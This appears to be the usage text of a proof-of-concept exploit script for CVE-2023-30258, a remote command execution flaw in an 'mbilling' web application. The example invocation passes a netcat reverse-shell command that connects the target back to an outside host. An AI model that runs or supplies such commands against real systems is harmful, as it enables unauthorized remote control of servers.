
CVE-2023-30258-RCE के लिए POC, n0o0b द्वारा
n0o0b द्वारा CVE-2023-30258-RCE के लिए POC
usage: poc.py [-h] [-u URL] [-c CMD]
example. python poc.py -u http://10.10.69.34/mbilling --cmd "nc -c sh 10.21.126.163 8888"
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-c CMD, --cmd CMD Command to execute